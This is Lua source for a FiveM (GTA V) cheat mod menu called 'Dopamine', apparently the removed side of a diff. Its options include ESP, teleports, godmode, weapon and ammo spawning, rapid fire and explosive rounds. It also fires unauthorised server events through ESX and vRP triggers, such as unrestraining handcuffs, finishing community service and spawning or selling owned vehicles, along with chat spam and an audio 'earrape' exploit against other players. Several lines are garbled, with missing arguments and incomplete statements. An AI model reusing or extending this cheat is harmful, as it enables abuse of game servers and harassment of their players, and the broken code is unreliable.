- elseif Dopamine.checkBox('Blackout', Dopamine.storedControls.visBlackout) then
- Dopamine.storedControls.visBlackout = not Dopamine.storedControls.visBlackout
- elseif Dopamine.button('Optimize FPS', 'Native') then
- Dopamine.functions.optimizeFPS()
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('visualOptionsESP') then
- if Dopamine.checkBox('Enable', Dopamine.storedControls.visESPEnable) then
- Dopamine.storedControls.visESPEnable = not Dopamine.storedControls.visESPEnable
- Dopamine.functions.toggleESP()
- elseif Dopamine.checkBox('ID', Dopamine.storedControls.visESPShowID) then
- Dopamine.storedControls.visESPShowID = not Dopamine.storedControls.visESPShowID
- elseif Dopamine.checkBox('Name', Dopamine.storedControls.visESPShowName) then
- Dopamine.storedControls.visESPShowName = not Dopamine.storedControls.visESPShowName
- elseif Dopamine.checkBox('Distance', Dopamine.storedControls.visESPShowDistance) then
- Dopamine.storedControls.visESPShowDistance = not Dopamine.storedControls.visESPShowDistance
- elseif Dopamine.checkBox('Weapon', Dopamine.storedControls.visESPShowWeapon) then
- Dopamine.storedControls.visESPShowWeapon = not Dopamine.storedControls.visESPShowWeapon
- elseif Dopamine.checkBox('Vehicle', Dopamine.storedControls.visESPShowVehicle) then
- Dopamine.storedControls.visESPShowVehicle = not Dopamine.storedControls.visESPShowVehicle
- elseif Dopamine.comboBoxSlider('ESP Refresh Rate', Dopamine.storedControls.visualsESPRefreshRates, Dopamine.storedControls.currentESPRefreshIndex, Dopamine.storedControls.selectedESPRefreshIndex,
- function(currentIndex, selectedIndex)
- Dopamine.storedControls.currentESPRefreshIndex = currentIndex
- Dopamine.storedControls.selectedESPRefreshIndex = currentIndex
- if currentIndex == 1 then
- Dopamine.storedControls.visualsESPRefreshRate = 0
- elseif currentIndex == 2 then
- Dopamine.storedControls.visualsESPRefreshRate = 50
- elseif currentIndex == 3 then
- Dopamine.storedControls.visualsESPRefreshRate = 150
- elseif currentIndex == 4 then
- Dopamine.storedControls.visualsESPRefreshRate = 250
- elseif currentIndex == 5 then
- Dopamine.storedControls.visualsESPRefreshRate = 500
- elseif currentIndex == 6 then
- Dopamine.storedControls.visualsESPRefreshRate = 1000
- elseif currentIndex == 7 then
- Dopamine.storedControls.visualsESPRefreshRate = 2000
- elseif currentIndex == 8 then
- Dopamine.storedControls.visualsESPRefreshRate = 5000
- end
- end) then
- elseif Dopamine.comboBoxSlider('ESP Distance', Dopamine.storedControls.visualsESPDistanceOps, Dopamine.storedControls.currentVisualsESPDistance, Dopamine.storedControls.selectedVisualsESPDistance,
- function(currentIndex, selectedIndex)
- Dopamine.storedControls.currentVisualsESPDistance = currentIndex
- Dopamine.storedControls.selectedVisualsESPDistance = currentIndex
- Dopamine.storedControls.visualsESPDistance = Dopamine.storedControls.visualsESPDistanceOps[Dopamine.storedControls.currentVisualsESPDistance]
- end) then
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('teleportOptions') then
- if Dopamine.comboBox('Teleport To', {'Legion Square', 'Weed Farm', 'Meth Farm', 'Coke Farm', 'Money Wash', 'Mission Row PD'}, Dopamine.storedControls.currentTeleportToOptions, Dopamine.storedControls.selectedTeleportToOptions,
- function(currentIndex, selectedIndex)
- Dopamine.storedControls.currentTeleportToOptions = currentIndex
- Dopamine.storedControls.selectedTeleportToOptions = currentIndex
- end)
- then
- if Dopamine.storedControls.selectedTeleportToOptions == 1 then
- Dopamine.functions.teleportSelf(195.23, -934.04, 30.69)
- elseif Dopamine.storedControls.selectedTeleportToOptions == 2 then
- Dopamine.functions.teleportSelf(1066.009, -3183.386, -39.164)
- elseif Dopamine.storedControls.selectedTeleportToOptions == 3 then
- Dopamine.functions.teleportSelf(998.629, -3199.545, -36.394)
- elseif Dopamine.storedControls.selectedTeleportToOptions == 4 then
- Dopamine.functions.teleportSelf(1088.636, -3188.551, -38.993)
- elseif Dopamine.storedControls.selectedTeleportToOptions == 5 then
- Dopamine.functions.teleportSelf(1118.405, -3193.687, -40.394)
- elseif Dopamine.storedControls.selectedTeleportToOptions == 6 then
- Dopamine.functions.teleportSelf(441.56, -982.9, 30.69)
- end
- elseif Dopamine.button('Teleport To Waypoint', 'Native') then
- Dopamine.functions.teleportToWaypoint()
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('vehicleOptions') then
- if Dopamine.menuButton('Los Santos Customs', 'vehicleLosSantosCustoms') then
- elseif Dopamine.menuButton('Saved Vehicles', 'savedVehiclesOptions') then
- elseif Dopamine.menuButton('Vehicle Spawn List', 'vehicleSpawnList') then
- elseif Dopamine.checkBox('Godmode', Dopamine.storedControls.vehGodmode) then
- Dopamine.storedControls.vehGodmode = not Dopamine.storedControls.vehGodmode
- Dopamine.functions.repairVehicle(Dopamine.datastore.pLocalPlayer.cVehicle)
- elseif Dopamine.button('Repair Vehicle', 'Native') then
- Dopamine.functions.repairVehicle(Dopamine.datastore.pLocalPlayer.cVehicle)
- elseif Dopamine.button('Clean Vehicle', 'Native') then
- SetVehicleDirtLevel(Dopamine.datastore.pLocalPlayer.cVehicle, 0.0)
- elseif Dopamine.button('Dirty Vehicle', 'Native') then
- SetVehicleDirtLevel(Dopamine.datastore.pLocalPlayer.cVehicle, 15.0)
- elseif Dopamine.button('Flip Vehicle', 'Native') then
- SetVehicleOnGroundProperly(Dopamine.datastore.pLocalPlayer.cVehicle)
- elseif Dopamine.button('Delete Vehicle', 'Native') then
- Dopamine.functions.deleteVehicle(Dopamine.datastore.pLocalPlayer.cVehicle)
- elseif Dopamine.button('Delete Vehicles Within Radius', 'Native') then
- Dopamine.functions.deleteVehicle(Dopamine.datastore.pLocalPlayer.cVehicle, 100)
- elseif Dopamine.comboBoxSlider('Engine Power Boost', Dopamine.comboBoxes[3]._words, vehiclesEnginePowerBoostCurrent, vehiclesEnginePowerBoostSelected,
- function(currentIndex, selectedIndex)
- vehiclesEnginePowerBoostCurrent = currentIndex
- vehiclesEnginePowerBoostSelected = currentIndex
- end) then
- elseif Dopamine.comboBoxSlider('Engine Torque Boost', Dopamine.comboBoxes[3]._words, vehiclesEngineTorqueBoostCurrent, vehiclesEngineTorqueBoostSelected,
- function(currentIndex, selectedIndex)
- vehiclesEngineTorqueBoostCurrent = currentIndex
- vehiclesEngineTorqueBoostSelected = currentIndex
- end) then
- elseif Dopamine.comboBox('Change Sound', Dopamine.comboBoxes[2]._words, Dopamine.comboBoxes[2]._current, Dopamine.comboBoxes[2]._selected,
- function(currentIndex, selectedIndex)
- Dopamine.comboBoxes[2]._current = currentIndex
- Dopamine.comboBoxes[2]._selected = selectedIndex
- end) then
- ForceVehicleEngineAudio(GetVehiclePedIsIn(GetPlayerPed(-1), false), Dopamine.comboBoxes[2]._words[Dopamine.comboBoxes[2]._selected])
- elseif Dopamine.comboBox('Suspension', Dopamine.comboBoxes[1]._words, Dopamine.comboBoxes[1]._current, Dopamine.comboBoxes[1]._selected,
- function(currentIndex, selectedIndex)
- Dopamine.comboBoxes[1]._current = currentIndex
- Dopamine.comboBoxes[1]._selected = selectedIndex
- end) then
- local pVehicle = Dopamine.datastore.pLocalPlayer.cVehicle
- if pVehicle and DoesEntityExist(pVehicle) then
- local currentSuspension = GetVehicleHandlingFloat(pVehicle, 'CHandlingData', 'fSuspensionRaise')
- if Dopamine.comboBoxes[1]._words[Dopamine.comboBoxes[1]._selected] == 'Lower' then
- SetVehicleHandlingFloat(pVehicle, 'CHandlingData', 'fSuspensionRaise', currentSuspension - 0.01)
- elseif Dopamine.comboBoxes[1]._words[Dopamine.comboBoxes[1]._selected] == 'Raise' then
- SetVehicleHandlingFloat(pVehicle, 'CHandlingData', 'fSuspensionRaise', currentSuspension + 0.01)
- end
- Dopamine.functions.repairVehicle(pVehicle)
- end
- elseif Dopamine.checkBox('No Fall', Dopamine.storedControls.vehNoFall) then
- Dopamine.storedControls.vehNoFall = not Dopamine.storedControls.vehNoFall
- elseif Dopamine.checkBox('Rainbow Paintjob', Dopamine.storedControls.vehRainbowCol) then
- local storedPrimary, storedSecondary = nil
- if Dopamine.storedControls.vehRainbowCol then
- ClearVehicleCustomPrimaryColour(Dopamine.datastore.pLocalPlayer.cVehicle)
- ClearVehicleCustomSecondaryColour(Dopamine.datastore.pLocalPlayer.cVehicle)
- SetVehicleColours(Dopamine.datastore.pLocalPlayer.cVehicle, storedPrimary, storedSecondary)
- else
- storedPrimary, storedSecondary = GetVehicleColours(Dopamine.datastore.pLocalPlayer.cVehicle)
- end
- Dopamine.storedControls.vehRainbowCol = not Dopamine.storedControls.vehRainbowCol
- elseif Dopamine.checkBox('Rainbow Lights', Dopamine.storedControls.vehRainbowLights) then
- Dopamine.storedControls.vehRainbowLights = not Dopamine.storedControls.vehRainbowLights
- elseif Dopamine.checkBox('Wallride', Dopamine.storedControls.vehWallride) then
- Dopamine.storedControls.vehWallride = not Dopamine.storedControls.vehWallride
- elseif Dopamine.checkBox('2-Step Vehicle', Dopamine.storedControls.veh2Step) then
- Dopamine.storedControls.veh2Step = not Dopamine.storedControls.veh2Step
- elseif Dopamine.checkBox('Always Wheelie', Dopamine.storedControls.vehAlwaysWheelie) then
- Dopamine.storedControls.vehAlwaysWheelie = not Dopamine.storedControls.vehAlwaysWheelie
- elseif Dopamine.checkBox('Drift Smoke', Dopamine.storedControls.vehDriftSmoke) then
- Dopamine.storedControls.vehDriftSmoke = not Dopamine.storedControls.vehDriftSmoke
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('weaponOptions') then
- if Dopamine.menuButton('Give Single Weapon', 'weaponOptionsTypes') then
- elseif Dopamine.menuButton('Modify Weapon', 'weaponOptionsModification') then
- elseif Dopamine.button('Give All Weapons', 'Native') then
- Dopamine.functions.sPO.giveAllWeapons(false, GetPlayerPed(-1))
- elseif Dopamine.button('Remove All Weapons', 'Native') then
- RemoveAllPedWeapons(Dopamine.datastore.pLocalPlayer.pedId, true)
- elseif Dopamine.comboBox('Re-fill Ammo', {'Current', 'All'}, Dopamine.storedControls.weaponsGiveAmmoCurrent, Dopamine.storedControls.weaponsGiveAmmoSelected,
- function(currentIndex, selectedIndex)
- Dopamine.storedControls.weaponsGiveAmmoCurrent = currentIndex
- Dopamine.storedControls.weaponsGiveAmmoSelected = currentIndex
- end) then
- if Dopamine.storedControls.weaponsGiveAmmoSelected == 1 then
- local retval, weaponHash = GetCurrentPedWeapon(GetPlayerPed(-1), true)
- AddAmmoToPed(GetPlayerPed(-1), weaponHash, 250)
- elseif Dopamine.storedControls.weaponsGiveAmmoSelected == 2 then
- for i = 1, #Dopamine.trashTables.weaponsModels do
- AddAmmoToPed(GetPlayerPed(-1), GetHashKey(Dopamine.trashTables.weaponsModels[i]), 250)
- end
- end
- elseif Dopamine.comboBox('Damage Multiplier', Dopamine.storedControls.weaponsDamageMultiplier, Dopamine.storedControls.weaponsDamageMultiplierCurrent, Dopamine.storedControls.weaponsDamageMultiplierSelected,
- function(currentIndex, selectedIndex)
- Dopamine.storedControls.weaponsDamageMultiplierCurrent = currentIndex
- Dopamine.storedControls.weaponsDamageMultiplierSelected = currentIndex
- Dopamine.storedControls.weaponsDamageMultiplierSet = intToFloat(Dopamine.storedControls.weaponsDamageMultiplier[Dopamine.storedControls.weaponsDamageMultiplierSelected])
- end) then
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('weaponOptionsModification') then
- if Dopamine.checkBox('Custom Bullet', Dopamine.storedControls.weapCustomBullet) then
- Dopamine.storedControls.weapCustomBullet = not Dopamine.storedControls.weapCustomBullet
- elseif Dopamine.comboBox('Custom Bullets', Dopamine.menuTables.weaponsCustomBullet.words, Dopamine.menuTables.weaponsCustomBullet.current, Dopamine.menuTables.weaponsCustomBullet.selected,
- function(currentIndex, selectedIndex)
- Dopamine.menuTables.weaponsCustomBullet.current = currentIndex
- Dopamine.menuTables.weaponsCustomBullet.selected = currentIndex
- Dopamine.menuTables.weaponsCustomBullet.actual = Dopamine.menuTables.weaponsCustomBullet.lists[Dopamine.menuTables.weaponsCustomBullet.selected]
- end)
- then
- elseif Dopamine.checkBox('Explosive Impact', Dopamine.storedControls.weapExplosiveAmmo) then
- Dopamine.storedControls.weapExplosiveAmmo = not Dopamine.storedControls.weapExplosiveAmmo
- elseif Dopamine.checkBox('Teleport To Impact', Dopamine.storedControls.weapTeleportGun) then
- Dopamine.storedControls.weapTeleportGun = not Dopamine.storedControls.weapTeleportGun
- elseif Dopamine.checkBox('Rapid Fire', Dopamine.storedControls.weapRapidFire) then
- Dopamine.storedControls.weapRapidFire = not Dopamine.storedControls.weapRapidFire
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('serverOptions') then
- Dopamine.setSubTitle('serverOptions', 'Server IP: '..Dopamine.natives.getCurrentServerEndpoint())
- if Dopamine.menuButton('Server Resources', 'serverOptionsResources') then
- elseif Dopamine.menuButton('Trigger Events', 'serverOptionsTriggerEvents') then
- elseif Dopamine.comboBoxSlider('Ped Density', pedDensityXWords, pedDensityXCurrent, pedDensityXSelectedf,
- function(currentIndex, selectedIndex)
- pedDensityXCurrent = currentIndex
- pedDensityXSelectedf = currentIndex
- pedDensityXSelected = pedDensityX[currentIndex]
- end) then
- end
- if Dopamine.button('Resource', Dopamine.natives.getCurrentResourceName()) then
- end
- if Dopamine.functions.doesResourceExist('es_extended') then
- if Dopamine.datastore.es_extended then
- if Dopamine.button('ESX', (tostring(Dopamine.datastore.es_extended) == 'esx:getSharedObject' and '' or '~r~')..tostring(Dopamine.datastore.es_extended)) then
- end
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('serverOptionsResources') then
- if validResources and validResources ~= nil and #validResources > 0 then
- for _, resource in pairs(validResources) do
- if Dopamine.menuButton(resource, 'serverOptionsResourcesSelected') then
- SelectedResource = resource
- end
- end
- else
- local resourcesTableYK = Dopamine.trashFunctions.getResources()
- for i=1, #resourcesTableYK do
- if Dopamine.button(resourcesTableYK[i]) then
- end
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('serverOptionsResourcesSelected') then
- Dopamine.setSubTitle('serverOptionsResourcesSelected', SelectedResource .. ' Data')
- if Dopamine.menuButton('Client Events', 'serverOptionsResourcesSelectedCEvents') then
- end
- if Dopamine.menuButton('Server Events', 'serverOptionsResourcesSelectedSEvents') then
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('serverOptionsResourcesSelectedCEvents') then
- Dopamine.setSubTitle('serverOptionsResourcesSelectedCEvents', SelectedResource .. ' Client Events')
- for key, name in pairs(validResourceEvents[SelectedResource]) do
- if Dopamine.button(name) then
- print(key)
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('serverOptionsResourcesSelectedSEvents') then
- Dopamine.setSubTitle('serverOptionsResourcesSelectedSEvents', SelectedResource .. ' Server Events')
- if validResourceServerEvents[SelectedResource] ~= nil then
- for name, payload in pairs(validResourceServerEvents[SelectedResource]) do
- if Dopamine.button(name) then
- local tbl = msgpack.unpack(payload)
- local buffer = name .. '('
- for k, v in ipairs(tbl) do
- buffer = (buffer .. tostring(v) .. (k == #tbl and ')' or ', '))
- end
- if #tbl == 0 then
- buffer = (buffer .. ')')
- end
- print('^2' .. buffer)
- end
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('menuSettings') then
- if Dopamine.menuButton('Credits', 'credits') then
- elseif Dopamine.menuButton('Keybinds', 'keybindSettings') then
- elseif Dopamine.comboBox('Menu X', menuX, currentMenuX, selectedMenuX,
- function(currentIndex, selectedIndex)
- currentMenuX = currentIndex
- selectedMenuX = selectedIndex
- for i = 1, #Dopamine.menus_list do
- Dopamine.setMenuX(Dopamine.menus_list[i], menuX[currentMenuX])
- end
- end)
- then
- elseif Dopamine.comboBox('Menu Y', menuY, currentMenuY, selectedMenuY,
- function(currentIndex, selectedIndex)
- currentMenuY = currentIndex
- selectedMenuY = selectedIndex
- for i = 1, #Dopamine.menus_list do
- Dopamine.setMenuY(Dopamine.menus_list[i], menuY[currentMenuY])
- end
- end)
- then
- elseif Dopamine.comboBox('Maximum Displayed Options', menuOptionsCount, currentMenuOptionsCount, selectedMenuOptionsCount,
- function(currentIndex, selectedIndex)
- currentMenuOptionsCount = currentIndex
- selectedMenuOptionsCount = selectedIndex
- for i = 1, #Dopamine.menus_list do
- Dopamine.setMaxOptionCount(Dopamine.menus_list[i], menuOptionsCount[currentMenuOptionsCount])
- end
- end)
- then
- elseif Dopamine.comboBox('Theme', Dopamine.menuProps.availableThemes, currentThemeIndex, selectedThemeIndex,
- function(currentIndex, selectedIndex)
- currentThemeIndex = currentIndex
- selectedThemeIndex = currentIndex
- end) then
- Dopamine.menuProps.selectedTheme = Dopamine.menuProps.availableThemes[selectedThemeIndex]
- Dopamine.initTheme()
- elseif Dopamine.comboBox('Checkbox Style', Dopamine.menuProps.availableCheckboxStyles, currentCheckboxIndex, selectedCheckboxIndex,
- function(currentIndex, selectedIndex)
- currentCheckboxIndex = currentIndex
- selectedCheckboxIndex = currentIndex
- end) then
- Dopamine.menuProps.selectedCheckboxStyle = Dopamine.menuProps.availableCheckboxStyles[selectedCheckboxIndex]
- elseif Dopamine.checkBox('Rainbow', Dopamine.menuProps.selectedThemeRainbow) then
- Dopamine.menuProps.selectedThemeRainbow = not Dopamine.menuProps.selectedThemeRainbow
- elseif Dopamine.checkBox('Text Outline', Dopamine.menuProps.menu_TextOutline) then
- Dopamine.menuProps.menu_TextOutline = not Dopamine.menuProps.menu_TextOutline
- elseif Dopamine.checkBox('Text Drop Shadow', Dopamine.menuProps.menu_TextDropShadow) then
- Dopamine.menuProps.menu_TextDropShadow = not Dopamine.menuProps.menu_TextDropShadow
- elseif Dopamine.checkBox('Selection Rect', Dopamine.menuProps.menu_RectOverlay) then
- Dopamine.menuProps.menu_RectOverlay = not Dopamine.menuProps.menu_RectOverlay
- elseif Dopamine.button('~r~Close Menu', Dopamine.menuProps._mVersion) then
- Dopamine.closeMenu()
- Dopamine.shouldShowMenu = false
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('credits') then
- local creditsList = {
- 'Patri~s~k Ne~s~r~s~tige~s~l | N~s~ert~s~ige~s~l#5~s~39~s~1,',
- 'Flacko | sir Flacko#1234,',
- 'WarMenu |',
- 'SkidMenu |',
- 'RipTide |',
- 'LUX | leuit#0100, inspiration and help with sprites'
- }
- for i = 1, #creditsList do
- if Dopamine.button(creditsList[i]) then
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('keybindSettings') then
- for k, v in pairs(Dopamine.keyBinds) do
- if Dopamine.button(v.label, (v.handle and '['..v.handle..']' or '[None]')) then
- dir_print(json.encode(Keys))
- local aInput = Dopamine.trashFunctions.keyboardInput('Input New Key Name', '', 10)
- local key = string.upper(aInput)
- if Keys[key] then
- v.handle = key
- Dopamine.pushNotification('Menu bind has been set to ['..key..']', 5000)
- else
- if aInput == 'None' or aInput == nil or aInput == '' then
- if v == Dopamine.keyBinds.currentKeybindMenu then
- Dopamine.pushNotification('This key cannot be unbound.', 5000)
- else
- v.handle = nil
- Dopamine.pushNotification('Key has been unbound.', 5000)
- end
- else
- Dopamine.pushNotification('Key '..key..' is not valid!', 5000)
- end
- end
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('weaponOptionsTypes') then
- for yeet, ayy in pairs(Dopamine.trashTables.weaponsTable) do
- if Dopamine.menuButton(yeet, 'weaponOptionsTypeSelection') then
- weaponOptionsSelected = ayy
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('weaponOptionsTypeSelection') then
- for _, ayy in pairs(weaponOptionsSelected) do
- if Dopamine.menuButton(, 'weaponsModOptions') then
- weaponOptionsSelectedWeapon = ayy
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('weaponsModOptions') then
- if Dopamine.button('Spawn Weapon') then
- Dopamine.natives.giveWeaponToPed(GetPlayerPed(-1), GetHashKey(, 1000, false)
- elseif Dopamine.button('Add Ammo') then
- SetPedAmmo(GetPlayerPed(-1), GetHashKey(, 250)
- elseif Dopamine.checkBox('Infinite Ammo', weaponOptionsSelectedWeapon.bInfAmmo) then
- weaponOptionsSelectedWeapon.bInfAmmo = not weaponOptionsSelectedWeapon.bInfAmmo
- SetPedInfiniteAmmo(GetPlayerPed(-1), weaponOptionsSelectedWeapon.bInfAmmo, GetHashKey(
- SetPedInfiniteAmmoClip(GetPlayerPed(-1), true)
- PedSkipNextReloading(GetPlayerPed(-1))
- end
- for yeet, ayy in pairs(weaponOptionsSelectedWeapon.mods) do
- if Dopamine.menuButton(yeet, 'weaponsModSelect') then
- weaponOptionsSelectedMod = ayy
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('weaponsModSelect') then
- for _, ev in pairs(weaponOptionsSelectedMod) do
- if Dopamine.button( then
- GiveWeaponComponentToPed(GetPlayerPed(-1), GetHashKey(, GetHashKey(
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('savedVehiclesOptions') then
- Dopamine.setSubTitle('savedVehiclesOptions', #Dopamine.datastore.savedVehicles..' Saved Vehicles')
- if Dopamine.button('Save Current Vehicle', 'Input') then
- if IsPedInAnyVehicle(Dopamine.datastore.pLocalPlayer.pedId) then
- local cInput = Dopamine.trashFunctions.keyboardInput('name', '', 100)
- if then cInput = 'un-named' end
- local rGlobal = {name = cInput, props =}
- if rGlobal and rGlobal.props then
- table.insert(Dopamine.datastore.savedVehicles, rGlobal)
- end
- end
- end
- if Dopamine.datastore.savedVehicles and #Dopamine.datastore.savedVehicles > 0 then
- for _i=1, #Dopamine.datastore.savedVehicles do
- if Dopamine.menuButton(Dopamine.datastore.savedVehicles[_i].name..' | '..Dopamine.datastore.savedVehicles[_i].props.model, 'selectedSavedVehicleOptions') then
- Dopamine.datastore.savedVehiclesOptionsHandle = Dopamine.datastore.savedVehicles[_i]
- Dopamine.datastore.savedVehiclesOptionsDeleteHandle = _i
- end
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('selectedSavedVehicleOptions') then
- if Dopamine.button('Spawn Vehicle', 'Native') then
- local carToSpawn = Dopamine.datastore.savedVehiclesOptionsHandle
- if carToSpawn.props then
- Dopamine.functions.spawnCustomVehicle({hash = carToSpawn.props.model, props = carToSpawn.props, setIn = true})
- end
- elseif Dopamine.button('Remove Vehicle', 'Native') then
- table.remove(Dopamine.datastore.savedVehicles, Dopamine.datastore.savedVehiclesOptionsDeleteHandle)
- Dopamine.openMenu('savedVehiclesOptions')
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('vehicleLosSantosCustoms') then
- if Dopamine.menuButton('Cosmetic Upgrades', 'vehicleLosSantosCustomsCosmetics') then
- elseif Dopamine.menuButton('Performance Upgrades', 'vehicleLosSantosCustomsPerformance') then
- elseif Dopamine.button('Change License Plate', 'Native') then
- local plateInput = Dopamine.trashFunctions.keyboardInput('Enter Plate Text (8 Characters):', 'd0pamine', 8)
- if not then
- Dopamine.trashFunctions.reqControlOnce(Dopamine.datastore.pLocalPlayer.cVehicle)
- SetVehicleNumberPlateText(Dopamine.datastore.pLocalPlayer.cVehicle, plateInput)
- end
- elseif Dopamine.button('Max Peformance Upgrades', 'Native') then
- Dopamine.functions.maxPerformanceUpgrades(GetVehiclePedIsIn(Dopamine.datastore.pLocalPlayer.pedId))
- elseif Dopamine.button('Max All Upgrades', 'Native') then
- Dopamine.functions.maxUpgrades(GetVehiclePedIsIn(Dopamine.datastore.pLocalPlayer.pedId))
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('vehicleLosSantosCustomsCosmetics') then
- if IsPedInAnyVehicle(Dopamine.datastore.pLocalPlayer.pedId, 0) then
- else
- if Dopamine.button('You\'re not inside a vehicle') then
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('vehicleLosSantosCustomsPerformance') then
- if IsPedInAnyVehicle(Dopamine.datastore.pLocalPlayer.pedId, 0) then
- Dopamine.functions.initializeUpgradesTab()
- if IsToggleModOn(Dopamine.datastore.pLocalPlayer.cVehicle, 18) then
- turboStatus = '~g~Installed'
- else
- turboStatus = '~r~Not Installed'
- end
- if Dopamine.button('Turbo', turboStatus) then
- if not IsToggleModOn(Dopamine.datastore.pLocalPlayer.cVehicle, 18) then
- ToggleVehicleMod(Dopamine.datastore.pLocalPlayer.cVehicle, 18, not IsToggleModOn(Dopamine.datastore.pLocalPlayer.cVehicle, 18))
- else
- ToggleVehicleMod(Dopamine.datastore.pLocalPlayer.cVehicle, 18, not IsToggleModOn(Dopamine.datastore.pLocalPlayer.cVehicle, 18))
- end
- end
- else
- if Dopamine.button('You\'re not inside a vehicle') then
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('vehicleSpawnList') then
- if Dopamine.checkBox('Spawn Upgraded', Dopamine.storedControls.vehSpawnUpgraded) then
- Dopamine.storedControls.vehSpawnUpgraded = not Dopamine.storedControls.vehSpawnUpgraded
- elseif Dopamine.checkBox('Spawn Inside', Dopamine.storedControls.vehSpawnInside) then
- Dopamine.storedControls.vehSpawnInside = not Dopamine.storedControls.vehSpawnInside
- elseif Dopamine.button('Spawn Custom Vehicle', 'Native') then
- local ModelName = Dopamine.trashFunctions.keyboardInput('Enter Vehicle Spawn Name', '', 100)
- if ModelName and IsModelValid(ModelName) and IsModelAVehicle(ModelName) then
- Dopamine.functions.spawnCustomVehicle({hash = GetHashKey(ModelName), setIn = Dopamine.storedControls.vehSpawnInside})
- else
- Dopamine.pushNotification('Model is not valid!', 5000)
- end
- elseif Dopamine.button('Spawn & Ride Train', 'Native') then
- Dopamine.functions.spawnRandomTrain()
- end
- for yeet, ayy in ipairs(Dopamine.trashTables.vehicleCategories) do
- if Dopamine.menuButton(ayy, 'vehicleSpawnSelected') then
- selectedCarTypeIdx = yeet
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('vehicleSpawnSelected') then
- for yeet, ayy in ipairs(Dopamine.trashTables.fullVehiclesList[selectedCarTypeIdx]) do
- local vehname = GetLabelText(ayy)
- if vehname == 'NULL' then vehname = ayy end
- if Dopamine.menuButton(vehname, 'vehicleSpawnSelectedOptions') then
- selectedCarToSpawn = yeet
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('vehicleSpawnSelectedOptions') then
- if Dopamine.button('Spawn Car') then
- Dopamine.functions.spawnVehicle(Dopamine.trashTables.fullVehiclesList[selectedCarTypeIdx][selectedCarToSpawn])
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('serverOptionsTriggerEvents') then
- if Dopamine.menuButton('ESX Triggers', 'serverOptionsTriggerEventsESX') then
- elseif Dopamine.menuButton('vRP Triggers', 'serverOptionsTriggerEventsVRP') then
- elseif Dopamine.button('Spam Chat', 'Server') then
- local message = Dopamine.trashFunctions.keyboardInput('Enter message', 'www.d0pamine |', 60)
- Dopamine.functions.spamChat(message)
- elseif Dopamine.button('InteractSound Earrape', 'Server') then
- Dopamine.functions.exploits.interactSound()
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('serverOptionsTriggerEventsESX') then
- if Dopamine.menuButton('Money & Item Options', 'serverOptionsTriggerEventsESXMoney') then
- elseif Dopamine.button('Skin Changer', 'Client') then
- if Dopamine.functions.doesResourceExist('esx_skin') then
- Dopamine.closeMenu()
- Dopamine.dTCE(false, false, 'esx_skin:openRestrictedMenu', function(data, menu) end)
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- elseif Dopamine.button('Unrestrain Handcuffs', 'Client') then
- if Dopamine.functions.doesResourceExist('esx_policejob') then
- Dopamine.dTCE(false, false, 'esx_policejob:unrestrain')
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- elseif Dopamine.button('Full Hunger', 'Client') then
- if Dopamine.functions.doesResourceExist('esx_status') then
- Dopamine.dTCE(false, false, 'esx_status:set', 'hunger', 1000000)
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- elseif Dopamine.button('Full Thirst', 'Client') then
- if Dopamine.functions.doesResourceExist('esx_status') then
- Dopamine.dTCE(false, false, 'esx_status:set', 'thirst', 1000000)
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- elseif Dopamine.button('Tuner Chip', 'Client') then
- if Dopamine.functions.doesResourceExist('tunerchip') or Dopamine.functions.doesResourceExist('tunerlaptop') or
- Dopamine.functions.doesResourceExist('xgc-tuner') or Dopamine.functions.doesResourceExist('tuninglaptop') then
- Dopamine.dTCE(false, false, 'xgc-tuner:openTuner')
- Dopamine.dTCE(false, false, 'tuning:useLaptop')
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- elseif Dopamine.button('Open Jail Menu ~(!)', 'Client') then
- if Dopamine.functions.doesResourceExist('esx-qalle-jail') or Dopamine.functions.doesResourceExist('esx_qalle_jail') then
- Dopamine.dTCE(false, false, 'esx-qalle-jail:openJailMenu')
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- elseif Dopamine.button('Spawn Owned Vehicle', 'Server') then
- local ModelName = Dopamine.trashFunctions.keyboardInput('Enter Vehicle Spawn Name', '', 20)
- local PlateNumber = Dopamine.trashFunctions.keyboardInput('Enter Vehicle Plate Number', '', 8)
- Dopamine.functions.sPO.SpawnLegalVehicle(ModelName, PlayerId(), PlateNumber)
- elseif Dopamine.button('Sell Owned Vehicle', 'Server') then
- Dopamine.functions.sPO.ESXSellVehicle()
- elseif Dopamine.button('Finish Community Service', 'Server') then
- Dopamine.dTCE(false, true, 'esx_communityservice:finishCommunityService', -1)
